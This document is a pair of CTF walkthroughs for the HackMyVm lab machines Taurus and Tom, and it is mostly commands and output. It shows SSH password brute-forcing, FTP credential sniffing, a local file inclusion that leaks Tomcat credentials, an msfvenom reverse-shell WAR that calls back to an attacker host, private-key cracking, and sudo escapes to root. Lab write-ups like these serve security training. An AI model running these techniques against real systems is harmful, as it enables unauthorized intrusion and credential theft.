root@breakout:~# id;hostname
id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout

HackMyVm Taurus Walkthrough

HackMyVm Taurus Walkthrough

Keypoints: generate custom dic, tcpdump, IPv6

https://hackmyvm.eu/machines/machine.php?vm=Taurus

Scan ports first, only 21 and 22 open, and 21 is filtered.

 nmap -sV -sC -p- -Pn -oN ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00082s latency).
 Not shown: 65533 closed ports
 PORT   STATE    SERVICE VERSION
 21/tcp filtered ftp
 22/tcp open     ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
 | ssh-hostkey:
 |   3072 9e:f1:ed:84:cc:41:8c:7e:c6:92:a9:b4:29:57:bf:d1 (RSA)
 |   256 9f:f3:93:db:72:ff:cd:4d:5f:09:3e:dc:13:36:49:23 (ECDSA)
 |_  256 e7:a3:72:dd:d5:af:e2:b5:77:50:ab:3d:27:12:0f:ea (ED25519)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan udp ports, we found snmp port is open.

 nmap -sU --top-ports 200 -oN udp_ports.log 192.168.56.100
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00089s latency).
 Not shown: 198 closed ports
 PORT    STATE         SERVICE
 68/udp  open|filtered dhcpc
 161/udp open|filtered snmp

Use snmpwalk to get info from port 161, now we know the name sarah.

 ~ snmpwalk -v 1 -c public 192.168.56.100    
 iso.3.6.1.2.1.1.1.0 = STRING: "Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64"
 iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
 iso.3.6.1.2.1.1.3.0 = Timeticks: (1183326) 3:17:13.26
 iso.3.6.1.2.1.1.4.0 = STRING: "Sarah <sarah@hmv.org>"
 iso.3.6.1.2.1.1.5.0 = STRING: "\"I Love My Name, Don't You, Little Hackers ?\""
 iso.3.6.1.2.1.1.6.0 = STRING: "Unknown"
 iso.3.6.1.2.1.1.8.0 = Timeticks: (1) 0:00:00.01

...

Here is the tricky part. In order to brute force ssh password of sarah, we need a password dic, which can be generated by cupp. First name is sarah, the rest part input nothing.

~ cupp -i        
  ___________                                                                              
    cupp.py!                 # Common
       \                     # User
        \   ,__,             # Passwords
         \  (oo)____         # Profiler
            (__)    )\    
               ||--|| *      [ Muris Kurgas | j0rgan@remote-exploit.org ]
                             [ Mebus | https://github.com/Mebus/]

 [+] Insert the information about the victim to make a dictionary
 [+] If you don't know all the info, just hit enter when asked! ;)

 > First Name: sarah
 > Surname:
 > Nickname:
 > Birthdate (DDMMYYYY):
 ...

Successfully get the password of sarah.

```bash
~ hydra -l sarah -P sarah.txt -e nsr 192.168.56.100 ssh -t64 -F
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-10-21 11:34:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 111 login tries (l:1/p:111), ~2 tries per task
[DATA] attacking ssh://192.168.56.100:22/
[22][ssh] host: 192.168.56.100 login: sarah password: Sarah_2012
[STATUS] attack finished for 192.168.56.100 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-10-21 11:34:26


In sarah's home folder, found a file default.tar, which is unreadable now.

 ```bash
sarah@taurus:~$ ls -la
 total 32
 drwx------ 2 sarah sarah 4096 Oct 20 17:14 .
 drwxr-xr-x 4 root  root  4096 Oct 16 19:17 ..
 lrwxrwxrwx 1 root  root     9 Oct 16 19:56 .bash_history -> /dev/null
 -rw-r--r-- 1 sarah sarah  220 Oct 16 08:53 .bash_logout
 -rw-r--r-- 1 sarah sarah 3526 Oct 16 08:53 .bashrc
 -rw-r--r-- 1 root  root  4608 Oct 20 17:09 default.tar
 -rw-r--r-- 1 sarah sarah  807 Oct 16 08:53 .profile
 -rw------- 1 sarah sarah  104 Oct 20 17:14 .Xauthority

Check sudo -l of user.

```bash
sarah@taurus:~$ sudo -l
Matching Defaults entries for sarah on taurus:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sarah may run the following commands on taurus:
(marion : marion) NOPASSWD: /usr/bin/bash /opt/ftp


Try to run it.  The ftp port opened and closed again quickly.

 ```bash
sarah@taurus:~$ sudo -u marion /usr/bin/bash /opt/ftp
 ftp connection opened.
 ftp connection closed.

Open another ssh terminal, run tcpdump to get data.

```bash
sarah@taurus:~$ tcpdump -i lo -nn -A
...
17:03:43.659795 IP6 ::1.21 > ::1.34582: Flags [P.], seq 36:70, ack 14, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 34: FTP: 331 Password required for marion
`....B.@.....................................H*9.........J.....
.{wh.{wh331 Password required for marion

17:03:43.659802 IP6 ::1.34582 > ::1.21: Flags [.], ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3615192936],
length 0
`.EX. .@.........................................H*[.....(.....
.{wh.{wh
17:03:43.659819 IP6 ::1.34582 > ::1.21: Flags [P.], seq 14:32, ack 70, win 512, options [nop,nop,TS val 3615192936 ecr 3
615192936], length 18: FTP: PASS ilovesushis
...


Escalate to user marion, check sudo -l again.

 ```bash
sarah@taurus:~$ su marion
 Password:
 marion@taurus:/home/sarah$ sudo -l
 Matching Defaults entries for marion on taurus:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User marion may run the following commands on taurus:
     (ALL : ALL) NOPASSWD: /usr/bin/ptar

Use ptar to pack /root/ to /tmp/, then extract it use tar.

```bash
marion@taurus:/tmp$ sudo /usr/bin/ptar -cvf root.tar /root/
/root
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ tar -xvf root.tar -C ./
tar: Removing leading `//' from member names
//root
tar: Removing leading `/' from member names
/root/.bashrc
/root/root.txt
/root/.profile
/root/.bash_history
/root/.local
/root/.local/share
/root/.local/share/nano
/root/.ssh
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
marion@taurus:/tmp$ cat ./root/.ssh/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAuhCb4PqUqWAgQROGlOfqHiE9bBbe+bavDZjpFidqVJYxX5Jm9Mv/
e0R4R/1zwXxz0JdPAMZUOS8W9oiuc3TQ+seOp6vWKdLRd98bDycruGpbgMzHF0kULDeCN
...


Get root with ssh.

 ```bash
marion@taurus:/tmp$ ssh root@localhost -i root/.ssh/id_rsa
 Linux taurus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

 The programs included with the Debian GNU/Linux system are free software;
 the exact distribution terms for each program are described in the
 individual files in /usr/share/doc/*/copyright.

 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
 permitted by applicable law.
 Last login: Sat Oct 16 21:20:06 2021
 root@taurus:~# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 taurus

HackMyVm Tom Walkthrough

HackMyVm Tom Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Tom

Key points: tomcat configuration and upload

Scan ports.

~ nmap -sV -sC -p-  -Pn 192.168.56.100  -oN ports.log                                      
 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-16 09:56 CST
 Nmap scan report for deathnote.vuln (192.168.56.100)
 Host is up (0.00073s latency).
 Not shown: 65532 closed ports
 PORT     STATE SERVICE VERSION
 22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 55:5f:3f:15:c7:cb:5f:09:d6:a1:f5:70:06:d0:dd:bc (RSA)
 |   256 ec:db:41:19:b8:60:bc:53:6f:c7:ef:c6:d3:ee:b9:b8 (ECDSA)
 |_  256 2e:0d:03:27:a5:2a:0b:4e:b0:6a:42:01:57:fd:a9:9f (ED25519)
 80/tcp   open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Apache2 Debian Default Page: It works
 8080/tcp open  http    Apache Tomcat 9.0.54
 |_http-favicon: Apache Tomcat
 |_http-title: Apache Tomcat/9.0.54
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel        

<!--more-->

Enum port 80.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/index.html (Status: 200) [Size: 10701]
/javascript (Status: 301) [Size: 321] [--> http://192.168.56.100/javascript/]
/tomcat.php (Status: 200) [Size: 0]


Fuzz tomcat.php.

 ```bash
~ wfuzz -u 'http://192.168.56.100/tomcat.php?FUZZ=/etc/passwd'    -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt --hh 0
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000007570:   200        27 L     39 W       1441 Ch     "filez"  

Get /etc/passwd.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/passwd';
root:x:0:0:root:/root:/bin/bash
...
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
...
tomcat:x:1001:1001::/opt/tomcat:/bin/false


We need to get home dir of tomcat.

 ```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/etc/systemd/system/tomcat.service'                    fish-0 | 0 [10:29:59]
 [Unit]
 Description=Tomcat 9 servlet container
 After=network.target

 [Service]
 Type=forking

 User=tomcat
 Group=tomcat

 Environment="JAVA_HOME=/usr/lib/jvm/default-java"
 Environment="JAVA_OPTS=-Djava.security.egd=file:///dev/urandom"

 Environment="CATALINA_BASE=/opt/tomcat/latest"
 Environment="CATALINA_HOME=/opt/tomcat/latest"
 Environment="CATALINA_PID=/opt/tomcat/latest/temp/tomcat.pid"
 Environment="CATALINA_OPTS=-Xms512M -Xmx1024M -server -XX:+UseParallelGC"

 ExecStart=/opt/tomcat/latest/bin/startup.sh
 ExecStop=/opt/tomcat/latest/bin/shutdown.sh

 [Install]
 WantedBy=multi-user.target

Check password file at tomcat HOME dir.

```bash
~ curl 'http://192.168.56.100/tomcat.php?filez=/opt/tomcat/latest/conf/tomcat-users.xml';
...
<role rolename="admin-gui"/>
<role rolename="manager-script"/>
<user username="sml" password="H4ckMyP4$$w0rD!!!" roles="admin-gui,manager-script"/>
</tomcat-users>


Generate reverse shell for tomcat and upload.

 ```bash
~ msfvenom  -p java/shell_reverse_tcp lhost=192.168.56.150 lport=1234 -f war -o rev.war      
 Payload size: 13323 bytes
 Final size of war file: 13323 bytes
 Saved as: rev.war

 ~ curl --upload-file rev.war  -u 'sml:H4ckMyP4$$w0rD!!!' 'http://192.168.56.100:8080/manager/text/deploy?path=/upload'
 OK - Desplegada aplicación en trayectoria de contexto [/upload]

Get reverse shell.

```bash
~ curl 'http://192.168.56.100:8080/upload/rev.war';
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234 fish-0 | 0 [10:48:06]
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:52234.
id
uid=1001(tomcat) gid=1001(tomcat) grupos=1001(tomcat)


Check sudo -l.

 ```bash
tomcat@tom:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for tomcat on tom:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User tomcat may run the following commands on tom:
     (nathan) NOPASSWD: /usr/bin/ascii85

Read id_rsa of user nathan.

```bash
sudo -u nathan /usr/bin/ascii85 /home/nathan/.ssh/id_rsa -w 0
<~/M/P+/ODlr8PUC+;aDO&;FsnT<(.p&79M2o/M/O]:i^Ja/Q@"7ANCqj/4E<$;HZgq777JN78#4(DJ!fJ+@JXs/O`&r1G(s\6S()K2Dm...


Decode ascii85 online, then get id_rsa.

 ```bash
-----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: DES-EDE3-CBC,5065755920B77C45

 pbcIb9gxpAhVFNik1U4P7SK+WnXji8QFUh11KM0oL8TXesjh+eRNlkHuYBvmm7rI
 ...

Decrypt id_rsa.

```bash
~ /usr/share/john/ssh2john.py id_rsa > hash
~ john --wordlist=/usr/share/wordlists/rockyou.txt hash bash-0 | 1 [11:08:11]
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
darkness (id_rsa)
1g 0:00:00:29 81.06% (ETA: 11:09:00) 0.03336g/s 387097p/s 387097c/s 387097C/s 9405es..9405872
Session aborted


Login ssh as usr nathan, check sudo -l.

```bash
 ~ ssh nathan@192.168.56.100 -i id_rsa                                                                 john-0 | 1 [11:08:54]
 Enter passphrase for key 'id_rsa':
 Linux tom 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
 /usr/bin/xauth:  file /home/nathan/.Xauthority does not exist
 nathan@tom:~$ sudo -l
 Matching Defaults entries for nathan on tom:
     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User nathan may run the following commands on tom:
     (root) NOPASSWD: /usr/bin/lftp

Get root.

nathan@tom:~$ sudo lftp
 lftp :~> !id
 uid=0(root) gid=0(root) grupos=0(root)
 lftp :~> !bash
 root@tom:/home/nathan# id;hostname
 uid=0(root) gid=0(root) grupos=0(root)
 tom
 root@tom:/home/nathan#